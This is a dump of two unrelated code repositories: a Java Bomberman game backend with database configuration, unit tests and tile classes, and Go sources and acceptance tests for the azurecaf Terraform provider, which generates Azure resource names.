if (rootConnection != null) try {rootConnection.close();} catch (SQLException ignore) {/*ignore.printStackTrace();*/}
}
}
private SessionFactory sessionFactory;
private final Config config;
private static final Logger LOGGER = LogManager.getLogger(DataBaseServiceMySQLImpl.class);
public enum DBTYPE {
PRODUCTION, DEBUG
}
private static final class Config {
private Config(Map<String, String> externalParameters, DBTYPE dbtype) {
parameters = externalParameters;
switch (dbtype) {
case PRODUCTION:
makeProduction();
break;
case DEBUG:
makeDebug();
break;
}
}
private void makeProduction() {
dbName = parameters.get("db_name");
login = parameters.get("db_user");
password = parameters.get("db_password");
loginDomain = parameters.get("db_user") + '@' + parameters.get("db_domain");
creationMethod = parameters.get("db_creation_method");
address = "jdbc:mysql://" + parameters.get("db_domain") + ':' + parameters.get("db_port") + '/';
rootPassword = parameters.get("db_root_password");
}
private void makeDebug() {
dbName = parameters.get("db_name_debug");
login = parameters.get("db_user_debug");
password = <PASSWORD>("db_password_debug");
loginDomain = parameters.get("db_user_debug") + '@' + parameters.get("db_domain");
creationMethod = parameters.get("db_creation_method_debug");
address = "jdbc:mysql://" + parameters.get("db_domain") + ':' + parameters.get("db_port") + '/';
rootPassword = parameters.get("db_root_password");
}
public String getLoginDomain() {
return loginDomain;
}
public String getDbName() {
return dbName;
}
public String getRootPassword() {
return rootPassword;
}
public String getLogin() {
return login;
}
public String getPassword() {
return password;
}
public String getCreationMethod() {
return creationMethod;
}
public String getAddress() {
return address;
}
private String dbName;
private String login;
private String password;
private String rootPassword;
private String address;
private String loginDomain;
private String creationMethod;
private final Map<String, String> parameters;
}
}
<file_sep>/src/main/java/bomberman/mechanics/tiles/functors/ActionTileAbstractFunctor.java
package bomberman.mechanics.tiles.functors;
import bomberman.mechanics.World;
import bomberman.mechanics.interfaces.Actable;
import bomberman.mechanics.tiles.ActionTile;
public abstract class ActionTileAbstractFunctor implements Actable{
public ActionTileAbstractFunctor(World eventList){
this.eventList = eventList;
}
public void linkWithTile(ActionTile newOwner)
{
owner = newOwner;
}
protected ActionTile owner;
protected final World eventList;
}
<file_sep>/src/test/java/main/databaseService/DataBaseServiceMySQLImplTest.java
package main.databaseservice;
import constants.Constants;
import main.config.ServerInitializer;
import org.junit.Before;
import org.junit.Test;
import rest.UserProfile;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import static org.junit.Assert.*;
public class DataBaseServiceMySQLImplTest {
@Before
public void init() throws Exception {
final ServerInitializer serverInitializer = new ServerInitializer(null);
final Map<String, String> properties = serverInitializer.getPropertiesMap();
dataBase = new DataBaseServiceMySQLImpl(properties, DataBaseServiceMySQLImpl.DBTYPE.DEBUG);
}
@Test
public void testAddUser() throws Exception {
UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
assertEquals( dataBase.getById(user.getId()), dataBase.getByLogin(user.getLogin()));
user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNull(user);
}
@Test
public void testDeleteUser() throws Exception {
final UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
final String login = user.getLogin();
final long id = user.getId();
dataBase.deleteUser(id);
assertNull( dataBase.getById(id));
assertNull( dataBase.getByLogin(login));
}
@Test
public void testGetUsers() throws Exception {
final UserProfile user1 = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
final UserProfile user2 = dataBase.addUser("user1", "user1");
assertNotNull(user1);
assertNotNull(user2);
final Map<Long, UserProfile> map = new HashMap<>();
map.put(user1.getId(), user1);
map.put(user2.getId(), user2);
final Collection<UserProfile> userData = dataBase.getUsers();
assertNotNull(userData);
assertEquals(map.values().toString(), userData.toString());
}
@Test
public void testContainsID() throws Exception {
final UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
long id = user.getId();
assertEquals(true, dataBase.containsID(id));
id = -1L;
assertEquals(false, dataBase.containsID(id));
}
@Test
public void testSave() throws Exception {
UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
final int desiredScore = 100;
user.setScore(desiredScore);
user = dataBase.getByLogin(Constants.USER_LOGIN);
assertNotNull(user);
assertNotEquals(desiredScore, user.getScore());
user.setScore(desiredScore);
dataBase.save(user.getData());
user = dataBase.getByLogin(Constants.USER_LOGIN);
assertNotNull(user);
assertEquals(desiredScore, user.getScore());
}
@Test
public void testGetById() throws Exception {
final UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
final long id = user.getId();
assertEquals(user, dataBase.getById(id));
}
@Test
public void testGetByLogin() throws Exception {
final UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
assertEquals(user, dataBase.getByLogin(Constants.USER_LOGIN));
}
@Test
public void testContainsLogin() throws Exception {
final UserProfile user = dataBase.addUser(Constants.USER_LOGIN, Constants.USER_PASSWORD);
assertNotNull(user);
assertEquals(true, dataBase.containsLogin(Constants.USER_LOGIN));
assertEquals(false, dataBase.containsLogin(""));
}
private DataBaseServiceMySQLImpl dataBase;
}<file_sep>/src/main/java/bomberman/mechanics/tiles/OwnedActionTile.java
package bomberman.mechanics.tiles;
import bomberman.mechanics.Bomberman;
import bomberman.mechanics.interfaces.EntityType;
import bomberman.mechanics.interfaces.Ownable;
import bomberman.mechanics.tiles.behaviors.ActionTileAbstractBehavior;
import bomberman.mechanics.tiles.functors.ActionTileAbstractFunctor;
public class OwnedActionTile extends ActionTile implements Ownable {
public OwnedActionTile(int id, ActionTileAbstractFunctor functor, ActionTileAbstractBehavior behavior, EntityType entityType, Bomberman owner) {
super(id, functor, behavior, entityType);
this.owner = owner;
}
@Override
public Bomberman getOwner() {
return owner;
}
@Override
public boolean isPassable() {
return this.getType() != EntityType.BOMB;
}
private final Bomberman owner;
}
// This class is giant, huge KOCTblJIb!!!
//
// __ __
// \ \ / /
// \ \__________/ /
// \ ________ /
// \ \ / /
// | | | |
// | | | |
// | | | |
// | | | |
// | | | |
// | | | |
// | | | |
// \ \____/ /
// \ __ /
// || ||
// |\__/|
// \ /
// ||
// ||
// ||
// ||
// ||
// ||
// ||
// ||
// ||
// \__/<file_sep>/src/main/java/bomberman/mechanics/interfaces/Describable.java
package bomberman.mechanics.interfaces;
public interface
Describable{
EntityType getType();
int getID();
}
<file_sep>/src/main/java/main/Main.java
package main;
import bomberman.service.RoomManager;
import main.config.Context;
import main.config.ServerInitializer;
import main.websockets.WebSocketConnectionServlet;
import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.servlet.ServletContextHandler;
import org.eclipse.jetty.servlet.ServletHolder;
import org.glassfish.hk2.utilities.binding.AbstractBinder;
import org.glassfish.jersey.server.ResourceConfig;
import org.glassfish.jersey.servlet.ServletContainer;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import rest.Sessions;
import rest.Users;
import java.util.Map;
@SuppressWarnings("OverlyBroadThrowsClause")
public class Main {
public static void main(String[] args) throws Exception {
Context context = null;
Map<String, String> properties = null;
//noinspection OverlyBroadCatchBlock
try {
String propertyFileName = null;
if (args.length >= 1)
propertyFileName = args[0];
final ServerInitializer serverInitializer = new ServerInitializer(propertyFileName);
properties = serverInitializer.getPropertiesMap();
context = serverInitializer.fillNewContext();
UserTokenManager.changeHost(properties.get("host"));
UserTokenManager.changeMaxAge(Integer.parseInt(properties.get("cookie_max_age")));
} catch (Exception ex) {
LOGGER.fatal("Could not setup server. Aborting...", ex);
System.exit(1);
}
final int port = Integer.parseInt(properties.get("port"));
LOGGER.info("Starting at " + port + " port");
final Server server = new Server(port);
final ResourceConfig config = createNewInjectableConfig(context);
final ServletHolder restServletHolder = new ServletHolder(new ServletContainer(config));
final ServletHolder websocketServletHolder = new ServletHolder(new WebSocketConnectionServlet(context, Integer.parseInt(properties.get("ws_timeout"))));
final ServletContextHandler contextHandler = new ServletContextHandler(server, "/*");
contextHandler.addServlet(websocketServletHolder, "/game");
contextHandler.addServlet(restServletHolder, "/api/*");
server.setHandler(contextHandler);
new Thread((RoomManager) context.get(RoomManager.class)).start();
server.start();
server.join();
}
private static ResourceConfig createNewInjectableConfig(Context context) {
final ResourceConfig rc = new ResourceConfig(Users.class, Sessions.class);
rc.register(new AbstractBinder() {
@Override
protected void configure() {
bind(context);
}
});
return rc;
}
private static final Logger LOGGER = LogManager.getLogger(Main.class);
}
<file_sep>/src/main/java/bomberman/mechanics/interfaces/EventType.java
package bomberman.mechanics.interfaces;
public enum EventType {
ENTITY_UPDATED, TILE_SPAWNED, TILE_REMOVED
}
<file_sep>/README.md
# 2016-02-2d
2016-02-2d is Java backend of Bomberman game -- our Technopark project.
Refer to [wiki](https://github.com/VitalyNikolaev/2016-02-2d/wiki) to see the API details and launch specifics.
<file_sep>/src/main/java/bomberman/mechanics/tiles/DestructibleWall.java
package bomberman.mechanics.tiles;
import bomberman.mechanics.interfaces.EntityType;
public class DestructibleWall extends AbstractTile {
public DestructibleWall(int id) {
super(id);
}
@Override
public boolean isDestructible() {
return true;
}
@Override
public boolean isPassable() {
return false;
}
@Override
public boolean shouldSpawnBonusOnDestruction() {
return true;
}
@Override
public EntityType getType() {
return EntityType.DESTRUCTIBLE_WALL;
}
@SuppressWarnings("QuestionableName")
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
final DestructibleWall that = (DestructibleWall) o;
return getType() == that.getType();
}
@Override
public int hashCode() {
return getType().hashCode();
}
}
<file_sep>/src/test/java/bomberman/service/RoomTest.java
package bomberman.service;
import constants.Constants;
import main.websockets.MessageSendable;
import org.javatuples.Pair;
import org.junit.BeforeClass;
import org.junit.Test;
import rest.UserProfile;
import java.util.ArrayList;
import static org.junit.Assert.*;
import static org.mockito.Mockito.mock;
public class RoomTest {
@BeforeClass
public static void init() {
MOCK_USERS.add(new Pair<>(Constants.customMockUserProfile("u1", "p1", "sid1", 1), mock(MessageSendable.class)));
MOCK_USERS.add(new Pair<>(Constants.customMockUserProfile("u2", "p2", "sid2", 2), mock(MessageSendable.class)));
MOCK_USERS.add(new Pair<>(Constants.customMockUserProfile("u3", "p3", "sid3", 3), mock(MessageSendable.class)));
MOCK_USERS.add(new Pair<>(Constants.customMockUserProfile("u4", "p4", "sid4", 4), mock(MessageSendable.class)));
MOCK_USERS.add(new Pair<>(Constants.customMockUserProfile("u5", "p5", "sid5", 5), mock(MessageSendable.class)));
}
@Test
public void testGetCurrentCapacity() throws Exception {
final Room room = new Room();
assertEquals(0, room.getCurrentCapacity());
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
assertEquals(1, room.getCurrentCapacity());
room.insertPlayer(MOCK_USERS.get(1).getValue0(), MOCK_USERS.get(1).getValue1());
assertEquals(2, room.getCurrentCapacity());
room.removePlayer(MOCK_USERS.get(0).getValue0());
assertEquals(1, room.getCurrentCapacity());
}
@Test
public void testIsFilled() throws Exception {
final Room room = new Room();
assertEquals(false, room.isFilled());
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
room.insertPlayer(MOCK_USERS.get(1).getValue0(), MOCK_USERS.get(1).getValue1());
room.insertPlayer(MOCK_USERS.get(2).getValue0(), MOCK_USERS.get(2).getValue1());
room.insertPlayer(MOCK_USERS.get(3).getValue0(), MOCK_USERS.get(3).getValue1());
assertEquals(true, room.isFilled());
assertEquals(false, room.insertPlayer(MOCK_USERS.get(4).getValue0(), MOCK_USERS.get(4).getValue1()));
}
@Test
public void testIsEmpty() throws Exception {
final Room room = new Room();
assertEquals(true, room.isEmpty());
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
assertEquals(false, room.isEmpty());
}
@Test
public void testInsertPlayer() throws Exception {
final Room room = new Room();
assertEquals(false, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
assertEquals(true, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
}
@Test
public void testHasPlayer() throws Exception {
final Room room = new Room();
assertEquals(false, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
assertEquals(true, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
}
@Test
public void testRemovePlayer() throws Exception {
final Room room = new Room();
room.insertPlayer(MOCK_USERS.get(0).getValue0(), MOCK_USERS.get(0).getValue1());
assertEquals(true, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
room.removePlayer(MOCK_USERS.get(0).getValue0());
assertEquals(false, room.hasPlayer(MOCK_USERS.get(0).getValue0()));
}
private static final ArrayList<Pair<UserProfile, MessageSendable>> MOCK_USERS = new ArrayList<>();
}<file_sep>/src/main/java/bomberman/mechanics/interfaces/EntityType.java
package bomberman.mechanics.interfaces;
public enum EntityType {
BOMBERMAN, DESTRUCTIBLE_WALL, UNDESTRUCTIBLE_WALL, BONUS_INCMAXHP, BONUS_INCMAXRANGE, BONUS_DECBOMBSPAWN, BONUS_INCSPEED, BONUS_MOREBOMBS, BONUS_DROPBOMBONDEATH, BONUS_INVUL, BOMB, BOMB_RAY
}
<file_sep>/cfg/default.properties
ip = 0.0.0.0
host = localhost
port = 80
db_type = production
db_domain = localhost
db_port = 3306
db_name = bomberman_db
db_user = bomberman_db_user
db_password = <PASSWORD>
db_creation_method = update
db_name_debug = bomberman_db_debug
db_user_debug = bomberman_db_user_debug
db_password_debug = bomberman_db_password_debug
db_creation_method_debug = create-drop
db_root_password = <PASSWORD>
ws_timeout = 60000
cookie_max_age = 2400000
static_path = static/
userpic_width = 80
userpic_height = 80
game_threads_number = 4
<file_sep>/src/test/java/bomberman/mechanics/TileFactoryTest.java
package bomberman.mechanics;
import bomberman.mechanics.interfaces.EntityType;
import bomberman.mechanics.interfaces.ITile;
import bomberman.mechanics.interfaces.Ownable;
import constants.Constants;
import org.junit.Test;
import static org.junit.Assert.*;
@SuppressWarnings("OverlyBroadThrowsClause")
public class TileFactoryTest {
@Test
public void testGetNewDestructibleWall() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.DESTRUCTIBLE_WALL, 0);
assertNotNull(tile);
assertEquals(EntityType.DESTRUCTIBLE_WALL, tile.getType());
}
@Test
public void testGetNewUndestructibleWall() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.UNDESTRUCTIBLE_WALL, 0);
assertNotNull(tile);
assertEquals(EntityType.UNDESTRUCTIBLE_WALL, tile.getType());
}
@Test
public void testGetNewRangeBonus() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.BONUS_INCMAXRANGE, Constants.GameMechanicsMocks.getMockedWorld(), 0);
assertNotNull(tile);
assertEquals(EntityType.BONUS_INCMAXRANGE, tile.getType());
}
@Test
public void testGetNewSpawnTimeBonus() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.BONUS_DECBOMBSPAWN, Constants.GameMechanicsMocks.getMockedWorld(), 0);
assertNotNull(tile);
assertEquals(EntityType.BONUS_DECBOMBSPAWN, tile.getType());
}
@Test
public void testGetNewBomb() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.BOMB, Constants.GameMechanicsMocks.getMockedWorld(), Constants.GameMechanicsMocks.getBomberman(), 0);
assertNotNull(tile);
assertEquals(EntityType.BOMB, tile.getType());
assertEquals(Constants.GameMechanicsMocks.getBomberman(), ((Ownable) tile).getOwner());
}
@Test
public void testGetNewBombRay() throws Exception {
final TileFactory factory = TileFactory.getInstance();
final ITile tile = factory.getNewTile(EntityType.BOMB_RAY, Constants.GameMechanicsMocks.getMockedWorld(), Constants.GameMechanicsMocks.getBomberman(), 0);
assertNotNull(tile);
assertEquals(EntityType.BOMB_RAY, tile.getType());
assertEquals(Constants.GameMechanicsMocks.getBomberman(), ((Ownable) tile).getOwner());
}
} | 0acea36aadac214033f6ed9fecc2722336c4e7df | [
"Markdown",
"Java",
"INI"
] | 34 | Java | VitalyNikolaev/2016-02-2d | 37ec9a89688fb288bb885257d19a94a5ee29f3e8 | cbff8a2ad9bb5b468e187f1241889f371e295a07 |
refs/heads/master | <file_sep># V民之家
CDN
<file_sep>$(function(){var sp=document.getElementById('newslist').getElementsByTagName('ul');var last=document.getElementById('last');var next=document.getElementById('next');var n=0;for(var i=1;i<sp.length;i++){sp[i].style.display='none';}
last.onclick=function(){n--;if(n<0){n=0;}
for(var i=0;i<sp.length;i++){sp[i].style.display='none';}
sp[n].style.display='block';}
next.onclick=function(){n++;if(n>sp.length-1){n=sp.length-1;}
for(var i=0;i<sp.length;i++){sp[i].style.display='none';}
sp[n].style.display='block';}});<file_sep>jQuery(document).ready(function($) {
$(".article_body img").each(function(i) {
_self = $(this);
if (!this.parentNode.href) {
imgsrc = "";
if (_self.attr("data-original")) {
imgsrc = _self.attr("data-original");
} else {
imgsrc = _self.attr("src");
}
$(this).wrap("<a href='" + imgsrc + "' onclick='return hs.expand(this);' style='box-shadow:none;'></a>");
}
});
hs.graphicsDir = "/skin/highslide/";
hs.outlineType = "rounded-white";
hs.dimmingOpacity = 0.8;
hs.outlineWhileAnimating = true;
hs.showCredits = false;
hs.captionEval = "this.thumb.alt";
hs.numberPosition = "caption";
hs.align = "center";
hs.transitions = ["expand", "crossfade"];
hs.addSlideshow({
interval: 5000,
repeat: true,
useControls: true,
fixedControls: "fit",
overlayOptions: {
opacity: 0.75,
position: "bottom center",
hideOnMouseOut: true
}
});
}); | bc43b9b962f39bc3557e244cea555767621e98eb | [
"Markdown",
"JavaScript"
] | 3 | Markdown | mywl-cdn/vmcdn | 22789d118358fd498cb9e93d26723e04d08fc09a | 99e44ed5f3bee53fb5517558c0420ce02bfde1a2 |
refs/heads/main | <repo_name>aztfmod/terraform-provider-azurecaf<file_sep>/azurecaf/resource_naming_convention.go
package azurecaf
import (
"fmt"
"log"
"math/rand"
"regexp"
"strings"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/validation"
)
func resourceNamingConvention() *schema.Resource {
resourceMapsKeys := make([]string, 0, len(Resources))
for k := range Resources {
resourceMapsKeys = append(resourceMapsKeys, k)
}
for k := range ResourcesMapping {
resourceMapsKeys = append(resourceMapsKeys, k)
}
return &schema.Resource{
Create: resourceNamingConventionCreate,
Read: schema.Noop,
Delete: schema.RemoveFromState,
SchemaVersion: 2,
Schema: map[string]*schema.Schema{
"name": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
},
"convention": {
Type: schema.TypeString,
Optional: true,
Default: ConventionCafRandom,
ForceNew: true,
ValidateFunc: validation.StringInSlice([]string{
ConventionCafClassic,
ConventionCafRandom,
ConventionRandom,
ConventionPassThrough,
}, false),
},
"prefix": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
},
"prefixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
},
Optional: true,
ForceNew: true,
},
"suffixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
},
Optional: true,
ForceNew: true,
},
"postfix": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
ValidateFunc: validation.StringIsNotEmpty,
},
"max_length": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
ValidateFunc: validation.IntAtLeast(1),
},
"result": {
Type: schema.TypeString,
Computed: true,
},
"resource_type": {
Type: schema.TypeString,
Optional: true,
ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
ForceNew: true,
},
},
}
}
func resourceNamingConventionCreate(d *schema.ResourceData, meta interface{}) error {
return resourceNamingConventionRead(d, meta)
}
func resourceNamingConventionRead(d *schema.ResourceData, meta interface{}) error {
return getResult(d, meta)
}
func resourceNamingConventionDelete(d *schema.ResourceData, meta interface{}) error {
return nil
}
func getResult(d *schema.ResourceData, meta interface{}) error {
name := d.Get("name").(string)
prefix := d.Get("prefix").(string)
postfix := d.Get("postfix").(string)
resourceType := d.Get("resource_type").(string)
convention := d.Get("convention").(string)
desiredMaxLength := d.Get("max_length").(int)
// Load the regular expression based on the resource type
var regExFilter string
var resource ResourceStructure
var resourceFound bool = false
if resource, resourceFound = Resources[resourceType]; !resourceFound {
resource, resourceFound = ResourcesMapping[resourceType]
}
if !resourceFound {
return fmt.Errorf("Invalid resource type %s", resourceType)
}
regExFilter = string(resource.RegEx)
validationRegExPattern := string(resource.ValidationRegExp)
log.Printf(regExFilter)
var cafPrefix string
var randomSuffix string = randSeq(int(resource.MaxLength), nil)
// configuring the prefix, cafprefix, name, postfix depending on the naming convention
switch convention {
case ConventionCafRandom, ConventionCafClassic:
cafPrefix = resource.CafPrefix
case ConventionRandom:
//clear all the field to generate a random
name = ""
postfix = ""
}
// joning the elements performing first filter to remove non compatible characters based on the resource type
myRegex, _ := regexp.Compile(regExFilter)
validationRegEx, _ := regexp.Compile(validationRegExPattern)
// clear the name first based on the regexp filter of the resource type
nameList := []string{}
for _, s := range []string{prefix, cafPrefix, name, postfix} {
if strings.TrimSpace(s) != "" {
nameList = append(nameList, s)
}
}
userInputName := strings.Join(nameList, suffixSeparator)
userInputName = myRegex.ReplaceAllString(userInputName, "")
randomSuffix = myRegex.ReplaceAllString(randomSuffix, "")
// Generate the temporary name based on the concatenation of the values - default case is caf classic
generatedName := userInputName
//calculate the max length
var maxLength int = int(resource.MaxLength)
if desiredMaxLength > 0 && desiredMaxLength < maxLength {
maxLength = desiredMaxLength
}
//does the generated string contains random chars?
var containsRandomChar = false
switch convention {
case ConventionPassThrough:
// the naming is already configured
case ConventionCafClassic:
// the naming is already configured
default:
if len(userInputName) != 0 {
if len(userInputName) < (maxLength - 1) { // prevent adding a suffix separator as the last character
containsRandomChar = true
generatedName = strings.Join([]string{userInputName, randomSuffix}, suffixSeparator)
} else {
generatedName = userInputName
}
} else {
containsRandomChar = true
generatedName = randomSuffix
}
}
// Remove the characters that are not supported in the name based on the regular expression
filteredGeneratedName := myRegex.ReplaceAllString(generatedName, "")
var length int = len(filteredGeneratedName)
if length > maxLength {
length = maxLength
}
result := string(filteredGeneratedName[0:length])
// making sure the last char is alpha char if we included random string
if containsRandomChar && len(result) > len(userInputName) {
randomLastChar := alphagenerator[rand.Intn(len(alphagenerator)-1)]
resultRune := []rune(result)
resultRune[len(resultRune)-1] = randomLastChar
result = string(resultRune)
}
if resource.LowerCase {
result = strings.ToLower(result)
}
if !validationRegEx.MatchString(result) {
return fmt.Errorf("Invalid name for Random CAF naming %s %s Id:%s , the pattern %s doesn't match %s", resource.ResourceTypeName, name, d.Id(), validationRegExPattern, result)
}
d.Set("result", result)
// Set the attribute Id with the value
//d.SetId("none")
d.SetId(randSeq(16, nil))
return nil
}
<file_sep>/azurecaf/resource_naming_convention_cafclassic_test.go
package azurecaf
import (
"regexp"
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
)
func TestAccCafNamingConvention_Classic(t *testing.T) {
resource.UnitTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
Providers: testAccProviders,
CheckDestroy: testAccCheckResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccResourceCafClassicConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_st",
"log",
5,
"st"),
regexMatch("azurecaf_naming_convention.classic_st", regexp.MustCompile(Resources["st"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_aaa",
"automation",
14,
"aaa"),
regexMatch("azurecaf_naming_convention.classic_aaa", regexp.MustCompile(Resources["aaa"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_acr",
"registry",
11,
"acr"),
regexMatch("azurecaf_naming_convention.classic_acr", regexp.MustCompile(Resources["acr"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_rg",
"myrg",
7,
"rg"),
regexMatch("azurecaf_naming_convention.classic_rg", regexp.MustCompile(Resources["rg"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_afw",
"fire",
8,
"afw"),
regexMatch("azurecaf_naming_convention.classic_afw", regexp.MustCompile(Resources["afw"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_asr",
"recov",
9,
"asr"),
regexMatch("azurecaf_naming_convention.classic_asr", regexp.MustCompile(Resources["asr"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_evh",
"hub",
7,
"evh"),
regexMatch("azurecaf_naming_convention.classic_evh", regexp.MustCompile(Resources["evh"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_kv",
"passepartout",
15,
"kv"),
regexMatch("azurecaf_naming_convention.classic_kv", regexp.MustCompile(Resources["kv"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_aks",
"kubedemo",
12,
"aks"),
regexMatch("azurecaf_naming_convention.classic_aks", regexp.MustCompile(Resources["aks"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_aksdns",
"kubedemodns",
18,
"aksdns"),
regexMatch("azurecaf_naming_convention.classic_aksdns", regexp.MustCompile(Resources["aksdns"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_la",
"logs",
7,
"la"),
regexMatch("azurecaf_naming_convention.classic_la", regexp.MustCompile(Resources["la"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_nic",
"mynetcard",
13,
"nic"),
regexMatch("azurecaf_naming_convention.classic_nic", regexp.MustCompile(Resources["nic"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_nsg",
"sec",
7,
"nsg"),
regexMatch("azurecaf_naming_convention.classic_nsg", regexp.MustCompile(Resources["nsg"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_pip",
"mypip",
9,
"pip"),
regexMatch("azurecaf_naming_convention.classic_pip", regexp.MustCompile(Resources["pip"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_snet",
"snet",
9,
"snet"),
regexMatch("azurecaf_naming_convention.classic_snet", regexp.MustCompile(Resources["snet"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_vnet",
"vnet",
9,
"vnet"),
regexMatch("azurecaf_naming_convention.classic_vnet", regexp.MustCompile(Resources["vnet"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_vmw",
"winVMT",
15,
"vmw"),
regexMatch("azurecaf_naming_convention.classic_vmw", regexp.MustCompile(Resources["vmw"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.classic_vml",
"linuxVM",
11,
"vml"),
regexMatch("azurecaf_naming_convention.classic_vml", regexp.MustCompile(Resources["vml"].ValidationRegExp), 1),
),
},
},
})
}
const testAccResourceCafClassicConfig = `
#Storage account test
resource "azurecaf_naming_convention" "classic_st" {
convention = "cafclassic"
name = "log"
resource_type = "st"
}
# Azure Automation Account
resource "azurecaf_naming_convention" "classic_aaa" {
convention = "cafclassic"
name = "automation"
resource_type = "aaa"
}
# Azure Container registry
resource "azurecaf_naming_convention" "classic_acr" {
convention = "cafclassic"
name = "registry"
resource_type = "acr"
}
# Resource Group
resource "azurecaf_naming_convention" "classic_rg" {
convention = "cafclassic"
name = "myrg"
resource_type = "rg"
}
# Azure Firewall
resource "azurecaf_naming_convention" "classic_afw" {
convention = "cafclassic"
name = "fire"
resource_type = "afw"
}
# Azure Recovery Vault
resource "azurecaf_naming_convention" "classic_asr" {
convention = "cafclassic"
name = "recov"
resource_type = "asr"
}
# Event Hub
resource "azurecaf_naming_convention" "classic_evh" {
convention = "cafclassic"
name = "hub"
resource_type = "evh"
}
# Key Vault
resource "azurecaf_naming_convention" "classic_kv" {
convention = "cafclassic"
name = "passepartout"
resource_type = "kv"
}
# Azure Kubernetes Service
resource "azurecaf_naming_convention" "classic_aks" {
convention = "cafclassic"
name = "kubedemo"
resource_type = "aks"
}
# Azure Kubernetes Service
resource "azurecaf_naming_convention" "classic_aksdns" {
convention = "cafclassic"
name = "kubedemodns"
resource_type = "aksdns"
}
# Log Analytics Workspace
resource "azurecaf_naming_convention" "classic_la" {
convention = "cafclassic"
name = "logs"
resource_type = "la"
}
# Network Interface
resource "azurecaf_naming_convention" "classic_nic" {
convention = "cafclassic"
name = "mynetcard"
resource_type = "nic"
}
# Network Security Group
resource "azurecaf_naming_convention" "classic_nsg" {
convention = "cafclassic"
name = "sec"
resource_type = "nsg"
}
# Public Ip
resource "azurecaf_naming_convention" "classic_pip" {
convention = "cafclassic"
name = "mypip"
resource_type = "pip"
}
# subnet
resource "azurecaf_naming_convention" "classic_snet" {
convention = "cafclassic"
name = "snet"
resource_type = "snet"
}
# Virtual Network
resource "azurecaf_naming_convention" "classic_vnet" {
convention = "cafclassic"
name = "vnet"
resource_type = "vnet"
}
# VM Windows
resource "azurecaf_naming_convention" "classic_vmw" {
convention = "cafclassic"
name = "winVMToolongShouldbetrimmed"
resource_type = "vmw"
}
# VM Linux
resource "azurecaf_naming_convention" "classic_vml" {
convention = "cafclassic"
name = "linuxVM"
resource_type = "vml"
}
`
<file_sep>/docs/data-sources/azurecaf_name.md
# azurecaf_name
The data source azurecaf_name generate a name for a resource (recommended way as data sources are evaluated before resources got created).
